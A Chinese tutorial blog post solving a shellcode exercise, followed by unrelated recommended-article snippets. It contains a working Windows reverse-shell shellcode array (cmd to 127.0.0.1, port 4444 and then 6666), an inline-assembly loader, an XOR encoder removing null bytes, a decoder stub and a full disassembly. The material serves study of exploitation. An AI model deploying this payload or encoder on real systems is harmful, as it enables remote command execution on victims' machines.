shellcode基础(1)

题目：
已知以下是我写得一串x86二进制指令码，可以将其加载并运行。
char buff[]=
{"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56"
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0"
"\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" };
任务一：使用visual studio，将此shellcode插入你的c++代码中，编写此shellcode加载代码，跳转到buffer中并执行。
       提示：代码行数不超过5行。
需要的工具：visual studio 2010或以后的版本~~ C++，创建工程后请关闭DEP，请自行百度DEP是什么，如何关闭。
任务二：将其运行起来并动态调试，将其汇编形态代码抽取出来，理解每一行汇编代码的含义，修改shellcode，使其连接的端口变为6666。
       提示：visual studio调试有反汇编窗口。
任务三：修改shellcode，本shellcode中含有0x00,请使用一定的编码方法使shellcode不含0x00，在shellcode前增加解码头，从而使shellcode可以正常执行。
       提示：参考《0day安全》第三章

第一问：

直接加载shellcode的地址并运行

void main()
{
     __asm{
          lea eax, buff
          push eax
          ret
    }
}

将buff的地址放入eax，然后将eax压入栈顶，ret指令会弹出当前栈顶元素并跳转至此地址执行，则shellcode被执行

第二问：

这个shellcode是开启本机的4444端口并反弹一个cmd窗口，可以用nc监听本机的6666端口，然后运行第一问可以看到效果。

第二问直接将红色标准的4444的十六进制改为6666的十六进制就可以了。汇编代码后面附上。可以在OD中查看shellcode的执行过程。

第三问：

shellcode编解码的问题。

首先对shellcode进行异或编码，解决shellcode中包含0x00的问题，可以采用遍历，寻找一个可异或的key值

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char buff[]=
{"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x68\x7f\x00\x00\x01\x68\x02\x00\x1a\x0a\x89\xe6\x6a\x10\x56"
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0"
"\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
"\x09" };

void encoder(char* input, unsigned char key, int display_flag)
{
	int i = 0, len = 0;
	unsigned char result;
	FILE *fp;
	unsigned char * output;
	
	len = sizeof(buff);
	output = (unsigned char *)malloc(len + 1);
	if(!output)
	{
		printf("memory erro!\n");
		exit(0);
	}

	printf("%d\n\n",len);
	
	//encode
	for (i = 0; i < len; i++)
	{
		output[i] = input[i] ^ key;
		
		//print info 
		printf("%5d %5x",i,output[i]);
		if(i % 5 == 0)
		{
			printf("\n");	
		}
		
		if(output[i] == 0x00)
		{
			key = key + 0x01;
			i = 0;
			continue;
		}
		
		
	}

	printf("%x",key);

	if(!(fp = fopen("encode.txt", "w+")))
	{
		printf("output file create error!");
		exit(0);
	}

	fprintf(fp,"\"");
	for(i = 0; i < len; i++)
	{
		fprintf(fp, "\\x%0.2x", output[i]);
		if((i+1)%15 == 0)
		{
			fprintf(fp, "\"\n\"");
		}
	}
	fprintf(fp,"\";");
	fclose(fp);
	printf("dump the encode shellcode to encode.txt OK!\n");

	//print to screen
	if(display_flag)
	{
		for(i = 0; i < len; i++)
		{
			printf("%0.2x", output[i]);
			if((i + 1) % 15 == 0)
			{
				printf("\n");
			}
		}
	}
	free(output);
}

void main()
{
	encoder(buff, 0x01, 1);	
}

然后利用key值进行解码：

/*
	shellcode末尾加0x09;
	异或key=0x43;
 */

char final_sc[] =
{
"\x83\xc0\x14"
"\x33\xc9"
"\x8a\x1c\x08"
"\x80\xf3\x43"
"\x88\x1c\x08"
"\x41"
"\x80\xfb\x09"
"\x75\xf1"

"\xbf\xab\xca\x43\x43\x43\x23\xca\xa6\x72\x91\x27\xc8\x11\x73"
"\xc8\x11\x4f\xc8\x11\x57\xc8\x31\x6b\x4c\xf4\x09\x65\x72\xbc"
"\x72\x83\xef\x7f\x22\x3f\x41\x6f\x63\x82\x8c\x4e\x42\x84\xa1"
"\xb3\x11\x14\xc8\x11\x53\xc8\x01\x7f\x42\x93\xc8\x03\x3b\xc6"
"\x83\x37\x09\x42\x93\x13\xc8\x0b\x5b\xc8\x1b\x63\x42\x90\xa0"
"\x7f\x0a\xc8\x77\xc8\x42\x95\x72\xbc\x72\x83\xef\x82\x8c\x4e"
"\x42\x84\x7b\xa3\x36\xb7\x40\x3e\xbb\x78\x3e\x67\x36\xa1\x1b"
"\xc8\x1b\x67\x42\x90\x25\xc8\x4f\x08\xc8\x1b\x5f\x42\x90\xc8"
"\x47\xc8\x42\x93\xca\x07\x67\x67\x18\x18\x22\x1a\x19\x12\xbc"
"\xa3\x1b\x1c\x19\xc8\x51\xa8\xc5\x1e\x2b\x70\x71\x43\x43\x2b"
"\x34\x30\x71\x1c\x17\x2b\x0f\x34\x65\x44\xbc\x96\xfb\xd3\x42"
"\x43\x43\x6a\x87\x17\x13\x2b\x6a\xc3\x28\x43\xbc\x96\x13\x13"
"\x13\x13\x03\x13\x03\x13\x2b\xa9\x4c\x9c\xa3\xbc\x96\xca\x84"
"\x2b\x3c\x43\x43\x42\x2b\x41\x43\x59\x49\xca\xa5\x29\x53\x15"
"\x14\x2b\xda\xe6\x37\x22\xbc\x96\x2b\x20\x2e\x27\x43\xca\xa0"
"\x14\x14\x14\x72\xb5\x29\x51\x1a\x15\xa1\xbe\x25\x84\x07\x67"
"\x7f\x42\x42\xce\x07\x67\x53\x85\x43\x07\x17\x13\x15\x15\x15"
"\x05\x15\x0d\x15\x15\x10\x15\x2b\x3a\x8f\x7c\xc5\xbc\x96\xca"
"\xa3\x0d\x15\x05\xbc\x73\x2b\x4b\xc4\x5e\x23\xbc\x96\xf8\xa3"
"\x5e\x69\x49\x2b\xe5\xd6\xfe\xde\xbc\x96\x7f\x45\x3f\x49\xc3"
"\xb8\xa3\x36\x46\xf8\x04\x50\x31\x2c\x29\x43\x10\xbc\x96\x4a"
};

void main()
{
	__asm{
		lea eax,final_sc
			push eax
			ret
	}
}

其中final_sc[]的前半部分是解码的汇编机器码，后半部分是加密后的shellcode。

解码的汇编代码：

</pre><pre name="code" class="cpp">__asm
    {
        add eax, 0x14
        xor ecx, ecx
    decode_loop:
        mov bl, [eax+ecx]
        xor bl, 0x43         ;异或的加密key0x43
        mov [eax+ecx], bl
        inc ecx
        cmp bl,0x09          ;解码结束标识0x09
        jne decode_loop
    }

附shellcode的汇编源码：

unsigned char buff2[] = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56"
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0"
"\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";
//匿名管道
//http://outofmemory.cn/code-snippet/9210/create-niming-guandao-lian-jiedao-yuancheng-service-qi
main()
{
	/*__asm{
		lea eax,buff2
			push eax
			ret 

}*/
	__asm{
		    cld  
			call        label //_buff2+8Fh (114708Fh)  
			pushad  
			mov         ebp,esp  
			xor         edx,edx  
			mov         edx,dword ptr fs:[edx+30h]  //peb
		mov         edx,dword ptr [edx+0Ch]  //PEB_LDR_DATA
		mov         edx,dword ptr [edx+14h]  //InMemoryOrderModuleList
label8:
		mov         esi,dword ptr [edx+28h]  //basedllname
		movzx       ecx,word ptr [edx+26h]  //basedllname的长度
		xor         edi,edi  
label3:
		xor         eax,eax  
			lods        byte ptr [esi]  
		cmp         al,61h  
			jl         label2
			sub         al,20h  
label2:
		ror         edi,0Dh  
			add         edi,eax  
			loop       label3
			push        edx  
			push        edi  
			mov         edx,dword ptr [edx+10h]  
		mov         eax,dword ptr [edx+3Ch]  
		add         eax,edx  
			mov         eax,dword ptr [eax+78h]  
		test        eax,eax  
			je         label4
			add         eax,edx  
			push        eax  
			mov         ecx,dword ptr [eax+18h]  
		mov         ebx,dword ptr [eax+20h]  
		add         ebx,edx  
label7:
		jecxz      label5
			dec         ecx  
			mov         esi,dword ptr [ebx+ecx*4]  
		add         esi,edx  
			xor         edi,edi  
label6:
		xor         eax,eax  
			lods        byte ptr [esi]  
		ror         edi,0Dh  
			add         edi,eax  
			cmp         al,ah  
			jne       label6
			add         edi,dword ptr [ebp-8]  
		cmp         edi,dword ptr [ebp+24h]  
		jne         label7
			pop         eax  
			mov         ebx,dword ptr [eax+24h]  
		add         ebx,edx  
			mov         cx,word ptr [ebx+ecx*2]  
		mov         ebx,dword ptr [eax+1Ch]  
		add         ebx,edx  
			mov         eax,dword ptr [ebx+ecx*4]  
		add         eax,edx  
			mov         dword ptr [esp+24h],eax  
			pop         ebx  
			pop         ebx  
			popad  
			pop         ecx  
			pop         edx  
			push        ecx  
			jmp         eax  
label5:
		pop         eax  
label4:
		pop         edi  
			pop         edx  
			mov         edx,dword ptr [edx]  
		jmp       label8
label:
		pop         ebp  //将shellcode起始地址存入ebp
			push        3233h  
			push        5F327377h  //ws2_32
			push        esp  
			push        726774Ch  //hash of kernel32.dll
			call        ebp  
			mov         eax,190h  
			sub         esp,eax  
			push        esp  
			push        eax  
			push        6B8029h  
			call        ebp  
			push        eax  
			push        eax  
			push        eax  
			push        eax  
			inc         eax  
			push        eax  
			inc         eax  
			push        eax  
			push        0E0DF0FEAh  
			call        ebp  
			mov         edi,eax  
			push        100007Fh  //127.0.01
			push        5C110002h  //端口号4444==》0x115C
			mov         esi,esp  
			push        10h  
			push        esi  
			push        edi  
			push        6174A599h  
			call        ebp  
			push        646D63h  
			mov         ebx,esp  
			push        edi  
			push        edi  
			push        edi  
			xor         esi,esi  
			push        12h  
			pop         ecx  
label9:
		push        esi  
			loop       label9 
			mov         word ptr [esp+3Ch],101h  
			lea         eax,[esp+10h]  
		mov         byte ptr [eax],44h  
			push        esp  
			push        eax  
			push        esi  
			push        esi  
			push        esi  
			inc         esi  
			push        esi  
			dec         esi  
			push        esi  
			push        esi  
			push        ebx  
			push        esi  
			push        863FCC79h  
			call        ebp  
			mov         eax,esp  
			dec         esi  
			push        esi  
			inc         esi  
			push        dword ptr [eax]  
		    push        601D8708h  
			call        ebp  
			mov         ebx,0A2A1DE0h  
			push        9DBD95A6h  
			call        ebp  
			cmp         al,6  
			jl         label10//: _buff2+135h (1147135h)  
			cmp         bl,0E0h  
			jne        label10//  _buff2+135h (1147135h)  
			mov         ebx,6F721347h  
label10:
		push        0  
			push        ebx  
			call        ebp  
	}
	//
//	__asm{
//01147000 FC                   cld  
//01147001 E8 89 00 00 00       call        lable
//01147006 60                   pushad  
//01147007 89 E5                mov         ebp,esp  
//01147009 31 D2                xor         edx,edx  
//0114700B 64 8B 52 30          mov         edx,dword ptr fs:[edx+30h]  
//0114700F 8B 52 0C             mov         edx,dword ptr [edx+0Ch]  
//01147012 8B 52 14             mov         edx,dword ptr [edx+14h]  
//   label8:
//01147015 8B 72 28             mov         esi,dword ptr [edx+28h]  
//01147018 0F B7 4A 26          movzx       ecx,word ptr [edx+26h]  
//0114701C 31 FF                xor         edi,edi  
//	label3:
//0114701E 31 C0                xor         eax,eax  
//01147020 AC                   lods        byte ptr [esi]  
//01147021 3C 61                cmp         al,61h  
//01147023 7C 02                jl         label2// _buff2+27h (1147027h)  
//01147025 2C 20                sub         al,20h  
//label2:
//01147027 C1 CF 0D             ror         edi,0Dh  
//0114702A 01 C7                add         edi,eax  
//0114702C E2 F0                loop       label3// _buff2+1Eh (114701Eh)  
//0114702E 52                   push        edx  
//0114702F 57                   push        edi  
//01147030 8B 52 10             mov         edx,dword ptr [edx+10h]  
//01147033 8B 42 3C             mov         eax,dword ptr [edx+3Ch]  
//01147036 01 D0                add         eax,edx  
//01147038 8B 40 78             mov         eax,dword ptr [eax+78h]  
//0114703B 85 C0                test        eax,eax  
//0114703D 74 4A                je         label4// _buff2+89h (1147089h)  
//0114703F 01 D0                add         eax,edx  
//01147041 50                   push        eax  
//01147042 8B 48 18             mov         ecx,dword ptr [eax+18h]  
//01147045 8B 58 20             mov         ebx,dword ptr [eax+20h]  
//01147048 01 D3                add         ebx,edx  
//	label7:
//0114704A E3 3C                jecxz      label5// _buff2+88h (1147088h)  
//0114704C 49                   dec         ecx  
//0114704D 8B 34 8B             mov         esi,dword ptr [ebx+ecx*4]  
//01147050 01 D6                add         esi,edx  
//01147052 31 FF                xor         edi,edi  
//label6:
//01147054 31 C0                xor         eax,eax  
//01147056 AC                   lods        byte ptr [esi]  
//01147057 C1 CF 0D             ror         edi,0Dh  
//0114705A 01 C7                add         edi,eax  
//0114705C 38 E0                cmp         al,ah  
//0114705E 75 F4                jne       label6//  _buff2+54h (1147054h)  
//01147060 03 7D F8             add         edi,dword ptr [ebp-8]  
//01147063 3B 7D 24             cmp         edi,dword ptr [ebp+24h]  
//01147066 75 E2                jne         label7//_buff2+4Ah (114704Ah)  
//01147068 58                   pop         eax  
//01147069 8B 58 24             mov         ebx,dword ptr [eax+24h]  
//0114706C 01 D3                add         ebx,edx  
//0114706E 66 8B 0C 4B          mov         cx,word ptr [ebx+ecx*2]  
//01147072 8B 58 1C             mov         ebx,dword ptr [eax+1Ch]  
//01147075 01 D3                add         ebx,edx  
//01147077 8B 04 8B             mov         eax,dword ptr [ebx+ecx*4]  
//0114707A 01 D0                add         eax,edx  
//0114707C 89 44 24 24          mov         dword ptr [esp+24h],eax  
//01147080 5B                   pop         ebx  
//01147081 5B                   pop         ebx  
//01147082 61                   popad  
//01147083 59                   pop         ecx  
//01147084 5A                   pop         edx  
//01147085 51                   push        ecx  
//01147086 FF E0                jmp         eax  
//label5:
//01147088 58                   pop         eax  
//label4:
//01147089 5F                   pop         edi  
//0114708A 5A                   pop         edx  
//0114708B 8B 12                mov         edx,dword ptr [edx]  
//0114708D EB 86                jmp       label8//  _buff2+15h (1147015h)  
//	label:
//0114708F 5D                   pop         ebp  
//01147090 68 33 32 00 00       push        3233h  
//01147095 68 77 73 32 5F       push        5F327377h  
//0114709A 54                   push        esp  
//0114709B 68 4C 77 26 07       push        726774Ch  
//011470A0 FF D5                call        ebp  
//011470A2 B8 90 01 00 00       mov         eax,190h  
//011470A7 29 C4                sub         esp,eax  
//011470A9 54                   push        esp  
//011470AA 50                   push        eax  
//011470AB 68 29 80 6B 00       push        6B8029h  
//011470B0 FF D5                call        ebp  
//011470B2 50                   push        eax  
//011470B3 50                   push        eax  
//011470B4 50                   push        eax  
//011470B5 50                   push        eax  
//011470B6 40                   inc         eax  
//011470B7 50                   push        eax  
//011470B8 40                   inc         eax  
//011470B9 50                   push        eax  
//011470BA 68 EA 0F DF E0       push        0E0DF0FEAh  
//011470BF FF D5                call        ebp  
//011470C1 89 C7                mov         edi,eax  
//011470C3 68 7F 00 00 01       push        100007Fh  
//011470C8 68 02 00 11 5C       push        5C110002h  
//011470CD 89 E6                mov         esi,esp  
//011470CF 6A 10                push        10h  
//011470D1 56                   push        esi  
//011470D2 57                   push        edi  
//011470D3 68 99 A5 74 61       push        6174A599h  
//011470D8 FF D5                call        ebp  
//011470DA 68 63 6D 64 00       push        646D63h  
//011470DF 89 E3                mov         ebx,esp  
//011470E1 57                   push        edi  
//011470E2 57                   push        edi  
//011470E3 57                   push        edi  
//011470E4 31 F6                xor         esi,esi  
//011470E6 6A 12                push        12h  
//011470E8 59                   pop         ecx  
//label9:
//011470E9 56                   push        esi  
//011470EA E2 FD                loop       label9// _buff2+0E9h (11470E9h)  
//011470EC 66 C7 44 24 3C 01 01 mov         word ptr [esp+3Ch],101h  
//011470F3 8D 44 24 10          lea         eax,[esp+10h]  
//011470F7 C6 00 44             mov         byte ptr [eax],44h  
//011470FA 54                   push        esp  
//011470FB 50                   push        eax  
//011470FC 56                   push        esi  
//011470FD 56                   push        esi  
//011470FE 56                   push        esi  
//011470FF 46                   inc         esi  
//01147100 56                   push        esi  
//01147101 4E                   dec         esi  
//01147102 56                   push        esi  
//01147103 56                   push        esi  
//01147104 53                   push        ebx  
//01147105 56                   push        esi  
//01147106 68 79 CC 3F 86       push        863FCC79h  
//0114710B FF D5                call        ebp  
//0114710D 89 E0                mov         eax,esp  
//0114710F 4E                   dec         esi  
//01147110 56                   push        esi  
//01147111 46                   inc         esi  
//01147112 FF 30                push        dword ptr [eax]  
//01147114 68 08 87 1D 60       push        601D8708h  
//01147119 FF D5                call        ebp  
//0114711B BB E0 1D 2A 0A       mov         ebx,0A2A1DE0h  
//01147120 68 A6 95 BD 9D       push        9DBD95A6h  
//01147125 FF D5                call        ebp  
//01147127 3C 06                cmp         al,6  
//01147129 7C 0A                jl         label10//: _buff2+135h (1147135h)  
//0114712B 80 FB E0             cmp         bl,0E0h  
//0114712E 75 05                jne        label10//  _buff2+135h (1147135h)  
//01147130 BB 47 13 72 6F       mov         ebx,6F721347h  
//label10:
//01147135 6A 00                push        0  
//01147137 53                   push        ebx  
//01147138 FF D5                call        ebp  
//
//	}
}

微信小程序中数值计算的精度丢失问题 WorkAndDebugger 微信小程序微信小程序
在微信小程序中，当你遇到数值计算的精度丢失问题时，主要是因为JavaScript在处理浮点数时存在固有的精度问题。这是因为计算机内部使用二进制形式存储数字，而某些十进制小数在二进制中无法精确表示，从而导致了精度误差。解决这个问题的方法有几个：使用整数运算：如果你的应用允许，可以将所有涉及的小数转换为整数再进行计算。例如，将货币值乘以100转换为分进行计算，最后再除以100转换回元。function
api-ms-win-shcore-scaling-l1-1-1.dll解析及缺失解决策略：确保Windows高DPI显示正常 Nebula_042 windows
api-ms-win-shcore-scaling-l1-1-1.dll是Windows操作系统中的一个API接口库文件，属于WindowsShellCommonDLLs（Shell核心动态链接库）的一部分。这个特定的DLL文件与Windows的高DPI（每英寸点数）缩放功能紧密相关，支持应用程序在不同分辨率和缩放设置下正确显示界面元素，确保UI的清晰度和适配性。当系统提示api-ms-win-s
ERROR 1010 (HY000): Error dropping database (can‘t rmdir ‘./acct_01/‘, errno: 进击的CJR mysql 数据库 oracle
1.现象：使用dropdatabase命令删除数据库时，报17错误码，导致删除失败；2.原因，数据库中有其他文件，导致无法正常删除3.解决方法：退出数据库，使用shell命令进入数据库对应目录，使用rm-f*命名，删除所有剩余文件。4.重新使用mysql命令登录数据库，重新使用dropdatabase命令删除数据库。
【mysql】mysql之优化向往风的男子 DBA mysql 数据库
本站以分享各种运维经验和运维所需要的技能为主《python零基础入门》：python零基础入门学习《python运维脚本》：python运维脚本实践《shell》：shell学习《terraform》持续更新中：terraform_Aws学习零基础入门到最佳实战《k8》从问题中去学习k8s《docker学习》暂未更新《ceph学习》ceph日常问题解决分享《日志收集》ELK+各种中间件《运维日常》
mysql 双主脑裂_mysql双主+keepalived weixin_39789206 mysql 双主脑裂
环境OS：centos7Mysql版本：mysql5.7Keepalived:keepalived-1.2.20Mysql-vip:192.168.41.100Mysql-master1:192.168.41.10Mysql-master2:192.168.41.11实验环境关闭防火墙规则firewall-cmd一、配置两台mysql互为主从该过程的第一部分就是master记录二进制日志。在每个事
什么是黑链？什么是黑帽？什么是明链？倔强的小蚁云Zt 网络数据库 tcp/ip 运维
什么是黑链？什么是黑帽？什么是明链？黑链有哪几种表示方式！怎样预防黑链？首先我们说下黑链定义:黑链是SEO黑帽手法中相当普遍的一种手段，笼统地说，它就是指一些人用非正常的手段获取的其它网站的反向链接，最常见的黑链就是通过各种网站程序漏洞获取搜索引擎权重或者PR较高的网站的WEBSHELL，进而在被黑网站上链接自己的网站。黑链的写法黑链文本黑链标签被放在一个隐藏的div中。用户在浏览器中是无法看到的
web安全学习笔记（1）头发的天敌是代码 web安全学习笔记 web安全学习笔记
一、网络安全分支1.web安全——网站2.二进制安全物联网安全工控安全二、网站是如何搭建起来的1.服务器服务器与我们的家庭使用电脑有什么区别？①没有显卡②CPU+内存不同于家庭电脑2.操作系统家庭系统：WindowsXPWindows7Windows8Windows9Windows10Windows11服务器操作系统：Windows2000Windows2003Windows2008Windows
Windows下的TCP UDP网络调试工具-NetAssist以及Linux下的nc网络调试工具_tcp网络调试工具(1) 2401_83947434 程序员运维学习面试
为了做好运维面试路上的助攻手，特整理了上百道【运维技术栈面试题集锦】，让你面试不慌心不跳，高薪offer怀里抱！这次整理的面试题，小到shell、MySQL，大到K8s等云原生技术栈，不仅适合运维新人入行面试需要，还适用于想提升进阶跳槽加薪的运维朋友。本份面试集锦涵盖了174道运维工程师面试题128道k8s面试题108道shell脚本面试题200道Linux面试题51道docker面试题35道Je
国内版Office 365邮件追踪指南：命令行界面方法 xueyunshengling Office 365和Microsoft 365相关方案微软精华知识宝箱数据库 Exchange Powershell github 邮件跟踪邮件查询
目录一、前提条件二、安装PowerShell模块安装命令三、连接到ExchangeOnline步骤1：启动PowerShell步骤2：连接到ExchangeOnline四、执行邮件追踪步骤1：使用Get-MessageTrace命令获取过去48小时的邮件追踪信息获取特定发件人的邮件追踪信息获取特定收件人的邮件追踪信息步骤2：使用Get-MessageTraceDetail命令获取特定邮件的详细信息
老版本kafka查询topic消费情况(python查询) 代码是谁 kafka python 分布式
由于老版本的kafka缺少shell，导致无法通过命令直接进行查询，所以通过python代码，实现消费情况查询安装必须的包#pyhon2.5pipinstallkafka-python==1.4.7python脚本#!/usr/bin/envpythonimportsysfromkafkaimportKafkaConsumer,TopicPartitioniflen(sys.argv)!=2:pr
hackcon ctf 2018 | pwn wp fantasy_learner
BOF漏洞点:栈溢出利用过程栈溢出跳转callMeMaybe函数获得flagexpSheSellsSeaShells90流程分析:给出了输入的栈地址有一个栈溢出点没有nx利用过程:根据以上三点，得出可以使用ret2shellcode使用shellcraft生成shellcode利用栈溢出，输入并跳转到shellcodeexpSimpleYetElegent150这道题目做了最久，卡在了能否根据_d
第11章 32位x86处理器编程架构晴空闲雲架构汇编
第11章32位x86处理器编程架构IA-32(INTELArchitecture,32-bit)：INTEL32位处理器架构简称IA-3，以8086处理器为基础发展起来的。该章重点介绍了IA-32处理器的工作方式和相关技术。IA-32架构的基本执行环境寄存器的扩展32位处理器通用寄存器：包含EAX、EBX、ECX、EDX、ESI、EDI、EBP、ESP，它们的在原先16位处理器的AX、BX、CX、
二进制究竟有什么用？带你看看那些好玩儿的「位操作」码农小光
文章来源于公众号码农田小齐，作者小齐本齐计算机说到底就是0和1，所有的数在内存中都是以二进制的形式储存的。而位操作，或者说位运算，就是直接对内存中的二进制位进行操作。位运算可以说是我们的基本功，今天这篇文章就从以下角度和大家一起玩转位运算。位运算究竟有什么用？原码反码补码7种位运算当然了，位运算还有很多奇技淫巧，如果大家还想看进阶篇，记得给我点赞或者留言告诉我哦～位运算的作用在实际生产中，位运算是
Linux shell sed 命令详解 BugBear1989
详细的sed命令详解，请参考https://my.oschina.net/u/3908182/blog/1921761一、sed命令工作机制：每次读取一行文本至“模式空间(patternspace)”中，在模式空间中完成处理；将处理结果输出至标准输出设备；语法：sed[OPTION]...{script}[input-file]...参数说明-r支持扩展正则表达式-n静默模式-escript1-e
.Net 执行Linux下多行shell命令方法 xk_hypothesis Asp.Net Core C#.net linux
1.编写执行给定的多行shell命令方法publicclassShellCommandExecutor{//////执行给定的多行shell命令//////多行shell命令publicvoidExecuteMultiLineShellCommands(stringcommands){//确保所有换行符都是LF(\n)stringnormalizedCommands=NormalizeNewlin
使用Electron读取本地文件 ch_s_t 前端开发 electron javascript 前端
Electron原来叫AtomShell,可以用Web技术搭建桌面端程序，以Electron为基础，可以用HTML，CSS和javascriptpt实现程序逻辑和用户桌面，Electron程序一般有主进程和渲染进程，主进程是启动程序的Node脚本，提供对原生的node模块访问。渲染进程是由chromium管理的Web界面。以下的内容介绍从零开始搭建一个读取本地文件的Electron项目。一运行简单
C语言——希尔排序万河归海428 排序算法算法数据结构 visualstudio c语言
希尔排序是对于插入排序的一种优化代码：#include#includevoidshell_sort(int*p,intlen){inti;intj;intstep;inttmp;for(step=len/2;step>0;step=step/2){for(i=step;i=0&&tmp
Conda创建环境失败：000和404错误柚柚柚柚柚 conda
